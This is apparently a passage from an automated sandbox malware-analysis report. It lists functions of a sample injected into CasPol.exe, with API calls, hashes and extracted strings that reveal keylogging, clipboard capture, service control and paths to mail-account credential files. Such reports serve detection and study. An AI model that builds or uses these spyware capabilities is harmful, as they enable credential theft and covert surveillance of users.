                                                                                                                                                                                                                                  Function 04573856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,04573518,045723F1,04571F17), ref: 04573864
                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04573872
                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0457388B
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,04573518,045723F1,04571F17), ref: 045738DD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                  • Opcode ID: 564d52d78a3d3af8e2040048a1cba37d4b6d10f4b3c9a1b252e021533117c738
                                                                                                                                                                                                                                  • Instruction ID: 510dfaafbd030a1f6e6e1bc8c3f251b8e520a102288e88ab574a68b4d9ad34c5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 564d52d78a3d3af8e2040048a1cba37d4b6d10f4b3c9a1b252e021533117c738
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF01AC3261A7269DF7152A797C889562754FF45B79730023DED14690D0FF2A7C09F344
                                                                                                                                                                                                                                  Function 00437E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                  • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                                                                                                                                  • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                                                                                                                                                  Function 04575AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,04576C6C), ref: 04575AFA
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575B2D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575B55
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,04576C6C), ref: 04575B62
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,04576C6C), ref: 04575B6E
                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 04575B74
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                  • Opcode ID: b85df41bbece85dab9066562e7d976f7d7b81c42773a6b3f51fca6ee47d8ffec
                                                                                                                                                                                                                                  • Instruction ID: 2532f5d7d5dc6ad189af1356b181d2866be4c72e17c66fdaabfb839cde52e2fa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b85df41bbece85dab9066562e7d976f7d7b81c42773a6b3f51fca6ee47d8ffec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EF0CD3254450AFBF75236347C48E3E2B65FFC1975B240138FD1EA6980FE25A80A7165
                                                                                                                                                                                                                                  Function 00446EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00446F1E
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                  • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                                                                  • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                                                                                                                                                  Function 10016A7C Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,1000310F,1000E403,1000310F,?,?,1000FF84,?,1000310F,?), ref: 10016A80
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10016AB3
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10016ADB
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,1000310F,?,?,?,?,?,?,?,?,100147C0,?,00000000,?,1000310F), ref: 10016AE8
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,1000310F,?,?,?,?,?,?,?,?,100147C0,?,00000000,?,1000310F), ref: 10016AF4
                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 10016AFA
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                  • Opcode ID: abb8dc7b00a9e6ff34b690eb976e7739615ebad0393437c6e772e82f3a0abea1
                                                                                                                                                                                                                                  • Instruction ID: 628ed4293515944fb4ff5177b0ed0b0109413660cb9ab4ef9b2c29076bfe53c7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: abb8dc7b00a9e6ff34b690eb976e7739615ebad0393437c6e772e82f3a0abea1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39F02839140612B6D212D3649C87F5F32A6EFC96B1BB98124FE18BE191EF31DCD28463
                                                                                                                                                                                                                                  Function 00419C20 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                                                                                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                                                                                                                  • Opcode ID: e3fd1fc0c4787dc830b9cc3aea4eca8ac28d7cc032c9db4aeba6401df1942e4a
                                                                                                                                                                                                                                  • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3fd1fc0c4787dc830b9cc3aea4eca8ac28d7cc032c9db4aeba6401df1942e4a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                                                                                                                                                                  Function 00419D22 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                                                                                                                                                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                                                                                                                  • Opcode ID: cfedba9a7b07c5c42209e7ce9dcc6e811ae6a6b2ec58d24d97ebf78adb97293c
                                                                                                                                                                                                                                  • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfedba9a7b07c5c42209e7ce9dcc6e811ae6a6b2ec58d24d97ebf78adb97293c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                                                                                                                                                  Function 00419D87 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                                                                                                                                                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                                                                                                                  • Opcode ID: 714e6f05c059ed682b6d949b249bc3bacd7887d9d17cdc3247a131cf9d717c91
                                                                                                                                                                                                                                  • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 714e6f05c059ed682b6d949b249bc3bacd7887d9d17cdc3247a131cf9d717c91
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                                                                                                                                                                  Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Enum$InfoQueryValue
                                                                                                                                                                                                                                  • String ID: [regsplt]$DG
                                                                                                                                                                                                                                  • API String ID: 3554306468-1089238109
                                                                                                                                                                                                                                  • Opcode ID: 4234e3916868af505b3244b049647076bd482d9df227b43fd1b9f38754dba18e
                                                                                                                                                                                                                                  • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4234e3916868af505b3244b049647076bd482d9df227b43fd1b9f38754dba18e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                                                                                                                                                  Function 045711EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 04571E89: lstrlenW.KERNEL32(?,?,?,?,?,045710DF,?,?,?,00000000), ref: 04571E9A
                                                                                                                                                                                                                                    • Part of subcall function 04571E89: lstrcatW.KERNEL32(?,?,?,045710DF,?,?,?,00000000), ref: 04571EAC
                                                                                                                                                                                                                                    • Part of subcall function 04571E89: lstrlenW.KERNEL32(?,?,045710DF,?,?,?,00000000), ref: 04571EB3
                                                                                                                                                                                                                                    • Part of subcall function 04571E89: lstrlenW.KERNEL32(?,?,045710DF,?,?,?,00000000), ref: 04571EC8
                                                                                                                                                                                                                                    • Part of subcall function 04571E89: lstrcatW.KERNEL32(?,045710DF,?,045710DF,?,?,?,00000000), ref: 04571ED3
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 0457122A
                                                                                                                                                                                                                                    • Part of subcall function 0457173A: _strlen.LIBCMT ref: 04571855
                                                                                                                                                                                                                                    • Part of subcall function 0457173A: _strlen.LIBCMT ref: 04571869
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                                                                                                                                  • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                                                                                                                                  • API String ID: 4036392271-1520055953
                                                                                                                                                                                                                                  • Opcode ID: 80e510a6b84755129a0be8859c6db6eaa90f9006f88e2034004d4fb227d269f3
                                                                                                                                                                                                                                  • Instruction ID: 115c75bf5a9449e08d74ba4350823b212561340f7316840e6af25785c6616a1c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80e510a6b84755129a0be8859c6db6eaa90f9006f88e2034004d4fb227d269f3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD2198B9A506186BE710A790FC81FED7339FF80B15F001555FA04E72D0EAB17D858759
                                                                                                                                                                                                                                  Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                                                                                                                                                    • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                                                                                                                                                    • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                                                                                                                                    • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                                                                                                                                                    • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                                                                                                                                  • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                                                                                                                                                  • API String ID: 2974294136-753205382
                                                                                                                                                                                                                                  • Opcode ID: 6a42bb2a480eb043f98db2134829ca83a8d3048ecc62eae8b68ba6343dcb75fe
                                                                                                                                                                                                                                  • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a42bb2a480eb043f98db2134829ca83a8d3048ecc62eae8b68ba6343dcb75fe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                                                                                                                                                  Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EventLocalTimewsprintf
                                                                                                                                                                                                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                                                                                                  • API String ID: 1497725170-248792730
                                                                                                                                                                                                                                  • Opcode ID: 4a46a74ce4dc637b5b74a9ad9fe6ae49bf816b22ad3df8bf75a5d637a5b9b51e
                                                                                                                                                                                                                                  • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a46a74ce4dc637b5b74a9ad9fe6ae49bf816b22ad3df8bf75a5d637a5b9b51e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                                                                                                                                                                  Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
